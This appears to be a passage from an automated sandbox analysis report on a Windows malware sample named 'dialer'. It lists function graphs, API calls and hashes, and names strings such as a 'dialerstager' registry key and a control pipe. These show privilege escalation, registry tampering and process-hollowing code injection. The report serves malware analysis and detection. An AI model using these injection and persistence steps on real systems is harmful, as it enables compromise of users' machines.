                                                                                                                                                                                                      • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                                                                                                      • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: FindResourceA.KERNEL32 ref: 000000014000232F
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                                                                                                                                                        • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0000000140002263
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Resource$Security$CurrentDescriptorFindOpenToken$AdjustChangeCloseConvertCreateErrorExitFreeLastLoadLocalLockLookupNotificationPrivilegePrivilegesSizeofStringValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2373407002-0
                                                                                                                                                                                                      • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                                                                                                      • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                                                                                                                                                                      • String ID: SOFTWARE$dialerstager$open
                                                                                                                                                                                                      • API String ID: 4281403370-3931493855
                                                                                                                                                                                                      • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                                                                                                      • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                      • API String ID: 3462610200-2766056989
                                                                                                                                                                                                      • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                                                                                      • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                                                                                                                                                      • String ID: dialersvc64
                                                                                                                                                                                                      • API String ID: 4184240511-3881820561
                                                                                                                                                                                                      • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                                                                                      • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Delete$CloseEnumOpen
                                                                                                                                                                                                      • String ID: SOFTWARE\dialerconfig
                                                                                                                                                                                                      • API String ID: 3013565938-461861421
                                                                                                                                                                                                      • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                      • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$Write$CloseCreateHandle
                                                                                                                                                                                                      • String ID: \\.\pipe\dialercontrol_redirect64
                                                                                                                                                                                                      • API String ID: 148219782-3440882674
                                                                                                                                                                                                      • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                                                                                      • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000029.00000002.1470136697.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470081977.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470209554.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000029.00000002.1470304496.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_41_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: ntdll.dll
                                                                                                                                                                                                      • API String ID: 1646373207-2227199552
                                                                                                                                                                                                      • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                                                                                      • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:2.2%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:2.3%
                                                                                                                                                                                                      Total number of Nodes:897
                                                                                                                                                                                                      Total number of Limit Nodes:2
                                                                                                                                                                                                      execution_graph 2986 140001ac3 2989 140001a70 2986->2989 2987 14000199e 2991 140001a0f 2987->2991 2993 1400019e9 VirtualProtect 2987->2993 2988 140001b36 2990 140001ba0 4 API calls 2988->2990 2989->2987 2989->2988 2992 140001b53 2989->2992 2990->2992 2993->2987 2090 140001ae4 2091 140001a70 2090->2091 2092 14000199e 2091->2092 2093 140001b36 2091->2093 2096 140001b53 2091->2096 2095 140001a0f 2092->2095 2097 1400019e9 VirtualProtect 2092->2097 2098 140001ba0 2093->2098 2097->2092 2101 140001bc2 2098->2101 2099 140001c04 memcpy 2099->2096 2101->2099 2102 140001c45 VirtualQuery 2101->2102 2103 140001cf4 2101->2103 2102->2103 2107 140001c72 2102->2107 2104 140001d23 GetLastError 2103->2104 2105 140001d37 2104->2105 2106 140001ca4 VirtualProtect 2106->2099 2106->2104 2107->2099 2107->2106 2135 140001404 2208 140001394 2135->2208 2137 140001413 2138 140001394 2 API calls 2137->2138 2139 140001422 2138->2139 2140 140001394 2 API calls 2139->2140 2141 140001431 2140->2141 2142 140001394 2 API calls 2141->2142 2143 140001440 2142->2143 2144 140001394 2 API calls 2143->2144 2145 14000144f 2144->2145 2146 140001394 2 API calls 2145->2146 2147 14000145e 2146->2147 2148 140001394 2 API calls 2147->2148 2149 14000146d 2148->2149 2150 140001394 2 API calls 2149->2150 2151 14000147c 2150->2151 2152 140001394 2 API calls 2151->2152 2153 14000148b 2152->2153 2154 140001394 2 API calls 2153->2154 2155 14000149a 2154->2155 2156 140001394 2 API calls 2155->2156 2157 1400014a9 2156->2157 2158 140001394 2 API calls 2157->2158 2159 1400014b8 2158->2159 2160 140001394 2 API calls 2159->2160 2161 1400014c7 2160->2161 2162 140001394 2 API calls 2161->2162 2163 1400014d6 2162->2163 2164 1400014e5 2163->2164 2165 140001394 2 API calls 2163->2165 2166 140001394 2 API calls 2164->2166 2165->2164 2167 1400014ef 2166->2167 2168 1400014f4 2167->2168 2169 140001394 2 API calls 2167->2169 2170 140001394 2 API calls 2168->2170 2169->2168 2171 1400014fe 2170->2171 2172 140001503 2171->2172 2173 140001394 2 API calls 2171->2173 2174 140001394 2 API calls 2172->2174 2173->2172 2175 14000150d 2174->2175 2176 140001394 2 API calls 2175->2176 2177 140001512 2176->2177 2178 140001394 2 API calls 2177->2178 2179 140001521 2178->2179 2180 140001394 2 API calls 2179->2180 2181 140001530 2180->2181 2182 140001394 2 API calls 2181->2182 2183 14000153f 2182->2183 2184 140001394 2 API calls 2183->2184 2185 14000154e 2184->2185 2186 140001394 2 API calls 2185->2186 2187 14000155d 2186->2187 2188 140001394 2 API calls 2187->2188 2189 14000156c 2188->2189 2190 140001394 2 API calls 2189->2190 2191 14000157b 2190->2191 2192 140001394 2 API calls 2191->2192 2193 14000158a 2192->2193 2194 140001394 2 API calls 2193->2194 2195 140001599 2194->2195 2196 140001394 2 API calls 2195->2196 2197 1400015a8 2196->2197 2198 140001394 2 API calls 2197->2198 2199 1400015b7 2198->2199 2200 140001394 2 API calls 2199->2200 2201 1400015c6 2200->2201 2202 140001394 2 API calls 2201->2202 2203 1400015d5 2202->2203 2204 140001394 2 API calls 2203->2204 2205 1400015e4 2204->2205 2206 140001394 2 API calls 2205->2206 2207 1400015f3 2206->2207 2209 140006630 malloc 2208->2209 2210 1400013b8 2209->2210 2211 1400013c6 NtAlpcOpenSenderProcess 2210->2211 2211->2137 2212 140002104 2213 140002111 EnterCriticalSection 2212->2213 2217 140002218 2212->2217 2215 14000220b LeaveCriticalSection 2213->2215 2220 14000212e 2213->2220 2214 140002272 2215->2217 2216 140002241 DeleteCriticalSection 2216->2214 2217->2214 2217->2216 2219 140002230 free 2217->2219 2218 14000214d TlsGetValue GetLastError 2218->2220 2219->2216 2219->2219 2220->2215 2220->2218 2108 140001e65 2109 140001e67 signal 2108->2109 2110 140001e7c 2109->2110 2112 140001e99 2109->2112 2111 140001e82 signal 2110->2111 2110->2112 2111->2112 2994 140001f47 2995 140001e67 signal 2994->2995 2996 140001e99 2994->2996 2995->2996 2997 140001e7c 2995->2997 2997->2996 2998 140001e82 signal 2997->2998 2998->2996 2113 14000216f 2114 140002178 InitializeCriticalSection 2113->2114 2115 140002185 2113->2115 2114->2115 2116 140001a70 2119 14000199e 2116->2119 2120 140001a7d 2116->2120 2117 140001a0f 2118 1400019e9 VirtualProtect 2118->2119 2119->2117 2119->2118 2120->2116 2121 140001b53 2120->2121 2122 140001b36 2120->2122 2123 140001ba0 4 API calls 2122->2123 2123->2121 2221 140001e10 2222 140001e2f 2221->2222 2223 140001ecc 2222->2223 2227 140001eb5 2222->2227 2228 140001e55 2222->2228 2224 140001ed3 signal 2223->2224 2223->2227 2225 140001ee4 2224->2225 2224->2227 2226 140001eea signal 2225->2226 2225->2227 2226->2227 2228->2227 2229 140001f12 signal 2228->2229 2229->2227 2999 140002050 3000 14000205e EnterCriticalSection 2999->3000 3001 1400020cf 2999->3001 3002 1400020c2 LeaveCriticalSection 3000->3002 3003 140002079 3000->3003 3002->3001 3003->3002 3004 1400020bd free 3003->3004 3004->3002 3005 140001fd0 3006 140001fe4 3005->3006 3007 140002033 3005->3007 3006->3007 3008 140001ffd EnterCriticalSection LeaveCriticalSection 3006->3008 3008->3007 2238 140001ab3 2239 140001a70 2238->2239 2239->2238 2240 14000199e 2239->2240 2241 140001b36 2239->2241 2244 140001b53 2239->2244 2243 140001a0f 2240->2243 2245 1400019e9 VirtualProtect 2240->2245 2242 140001ba0 4 API calls 2241->2242 2242->2244 2245->2240 2080 140001394 2084 140006630 2080->2084 2082 1400013b8 2083 1400013c6 NtAlpcOpenSenderProcess 2082->2083 2085 14000664e 2084->2085 2088 14000667b 2084->2088 2085->2082 2086 140006723 2087 14000673f malloc 2086->2087 2089 140006760 2087->2089 2088->2085 2088->2086 2089->2085 2230 14000219e 2231 140002272 2230->2231 2232 1400021ab EnterCriticalSection 2230->2232 2233 140002265 LeaveCriticalSection 2232->2233 2235 1400021c8 2232->2235 2233->2231 2234 1400021e9 TlsGetValue GetLastError 2234->2235 2235->2233 2235->2234 2124 140001800 2125 140001812 2124->2125 2126 140001835 fprintf 2125->2126 2127 140001000 2128 14000108b __set_app_type 2127->2128 2129 140001040 2127->2129 2131 1400010b6 2128->2131 2129->2128 2130 1400010e5 2131->2130 2133 140001e00 2131->2133 2134 140006bd0 __setusermatherr 2133->2134 2236 140002320 strlen 2237 140002337 2236->2237 2246 140001140 2249 140001160 2246->2249 2248 140001156 2250 1400011b9 2249->2250 2251 14000118b 2249->2251 2252 1400011d3 2250->2252 2253 1400011c7 _amsg_exit 2250->2253 2251->2250 2254 1400011a0 Sleep 2251->2254 2255 140001201 _initterm 2252->2255 2256 14000121a 2252->2256 2253->2252 2254->2250 2254->2251 2255->2256 2272 140001880 2256->2272 2259 14000126a 2260 14000126f malloc 2259->2260 2261 14000128b 2260->2261 2263 1400012d0 2260->2263 2262 1400012a0 strlen malloc memcpy 2261->2262 2262->2262 2262->2263 2283 140003240 2263->2283 2265 140001315 2266 140001344 2265->2266 2267 140001324 2265->2267 2270 140001160 76 API calls 2266->2270 2268 140001338 2267->2268 2269 14000132d _cexit 2267->2269 2268->2248 2269->2268 2271 140001366 2270->2271 2271->2248 2273 140001247 SetUnhandledExceptionFilter 2272->2273 2274 1400018a2 2272->2274 2273->2259 2274->2273 2278 14000194d 2274->2278 2279 140001a20 2274->2279 2275 140001ba0 4 API calls 2275->2278 2276 14000199e 2276->2273 2277 1400019e9 VirtualProtect 2276->2277 2277->2276 2278->2275 2278->2276 2279->2276 2280 140001b36 2279->2280 2282 140001b53 2279->2282 2281 140001ba0 4 API calls 2280->2281 2281->2282 2286 140003256 2283->2286 2284 14000338a wcslen 2393 14000153f 2284->2393 2286->2284 2288 14000358e 2288->2265 2291 140003485 2294 1400034ab memset 2291->2294 2296 1400034dd 2294->2296 2297 14000352d wcslen 2296->2297 2298 140003543 2297->2298 2302 14000358c 2297->2302 2299 140003560 _wcsnicmp 2298->2299 2300 140003576 wcslen 2299->2300 2299->2302 2300->2299 2300->2302 2301 140003651 wcscpy wcscat memset 2304 140003690 2301->2304 2302->2301 2303 1400036d3 wcscpy wcscat memset 2305 140003716 2303->2305 2304->2303 2306 14000381e wcscpy wcscat memset 2305->2306 2307 140003860 2306->2307 2308 140003bab wcslen 2307->2308 2309 140003bb9 2308->2309 2313 140003beb 2308->2313 2310 140003bc0 _wcsnicmp 2309->2310 2311 140003bd6 wcslen 2310->2311 2310->2313 2311->2310 2311->2313 2312 140003cfa wcscpy wcscat memset 2314 140003d3c 2312->2314 2313->2312 2315 140003d7f wcscpy wcscat memset 2314->2315 2317 140003dc5 2315->2317 2316 140003df5 wcscpy wcscat 2318 1400061a2 memcpy 2316->2318 2319 140003e27 2316->2319 2317->2316 2318->2319 2320 140003f7a wcslen 2319->2320 2322 140003fbf 2320->2322 2321 140004024 wcslen memset 2533 